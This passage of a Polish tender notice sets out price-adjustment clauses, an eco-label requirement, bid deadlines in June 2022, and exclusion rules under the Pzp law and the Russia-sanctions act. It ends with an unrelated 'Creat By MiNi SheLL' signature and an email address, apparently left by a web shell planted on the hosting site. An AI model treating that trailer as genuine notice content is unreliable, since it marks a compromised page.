nie zostanie wykorzystana wartość umowy brutto określona w § 4 ust. 1 umowy, istnieje możliwość przedłużenia terminu realizacji umowy. W takim przypadku strony mogą zmienić umowę w następującym zakresie: termin realizacji przedmiotu umowy ulegnie zmianie – zostanie przedłużony do daty wskazanej przez Zamawiającego, jednak nie dłuższy niż 12 miesięcy,<br/>6)	w celu przywrócenia równowagi ekonomicznej umowy jaka istniała w momencie jej zawarcia, a która może zostać zakłócona przez zjawiska niezależne od stron, cena jednostkowa za poszczególny rodzaj artykułu może ulec zmianie (podwyższeniu lub obniżeniu) w przypadku gdy cena na rynku ulegnie zmianie w stosunku do ceny wskazanej w ofercie Wykonawcy o co najmniej 5%. Wówczas na pisemny wniosek strony, cena może być zmieniona o wskaźnik wzrostu cen towarów i usług konsumpcyjnych ogłaszany w obwieszczeniach Prezesa Głównego Urzędu Statystycznego (wskaźnik inflacji) za dany okres, chyba, że zmiana ceny poszczególnego artykułu jest mniejsza lub większa niż wskaźnik inflacji (w tej sytuacji strony dostosują cenę do aktualnych cen rynkowych danego artykułu). Zmiana ceny może być dokonana nie wcześniej niż po upływie 6 miesięcy od zawarcia niniejszej umowy i może być dokonana aneksem ze skutkiem na przyszłość, począwszy od daty złożenia przez stronę wniosku o jej zmianę. Maksymalna łączna wartość zmian cen za poszczególne artykuły nie może przekroczyć 30% ceny oferty określonej pierwotnie w § 4 ust. 1 umowy. Jeżeli zmiana na nie przywróci równowagi ekonomicznej umowy i będzie miało miejsce dalsze jej zakłócanie przez zjawiska niezależne od stron, każda ze stron będzie uprawniona do odstąpienia od umowy ze skutkiem na przyszłość przez złożenie drugiej stronie oświadczenia w każdym czasie, jednakże umowa ulegnie rozwiązaniu po upływie 3 miesięcy od daty złożenia oświadczenia o odstąpieniu od umowy. W tej sytuacji nie powstanie obowiązek zapłaty kary umownej za odstąpienie od umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie żądania określonej etykiety lub wskazania mającego zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustawy: - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-22 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pg_edu/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-22 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu.<br/>2.	Z postępowania o udzielenie zamówienia Zamawiający wykluczy Wykonawcę, w stosunku do którego zachodzi którakolwiek z okoliczności, o których mowa w art. 108 ustawy Pzp.<br/>3.	Zamawiający ponadto wykluczy Wykonawcę, w stosunku do którego zachodzą okoliczności, o których mowa w art. 109 ust. 1 pkt. 4 ustawy Pzp, tj. w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>4.	Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 jeżeli <br/>udowodni Zamawiającemu, że spełnił łącznie przesłanki określone w art. 110 ust. 2 Pzp.<br/>5. Zgodnie z art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie <br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, <br/>zwana dalej „ustawą” – (Dz.U. pod poz. 835) w celu przeciwdziałania wspieraniu agresji Federacji <br/>Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r., wobec osób i podmiotów wpisanych na listę, <br/>o której mowa w art. 2 ustawy, stosuje się sankcje polegające m.in. na wykluczeniu z postępowania o <br/>udzielenie zamówienia publicznego prowadzonego na podstawie Ustawy Pzp.<br/>6. 1 Na podstawie art. 7 ust. 1 ustawy z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy Pzp Zamawiający wykluczy:<br/>a) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>b) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>c) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>6.2 W przypadku wykonawcy wykluczonego na podstawie art. 7 ust. 1 ustawy, zamawiający odrzuca ofertę takiego wykonawcy. <br/>6.3 Ocena Wykonawcy pod kątem wykluczenia z tytułu powyższych przesłanek nastąpi w oparciu o wskazane powyżej wykazy i listy.

Creat By MiNi SheLL
Email: jattceo@gmail.com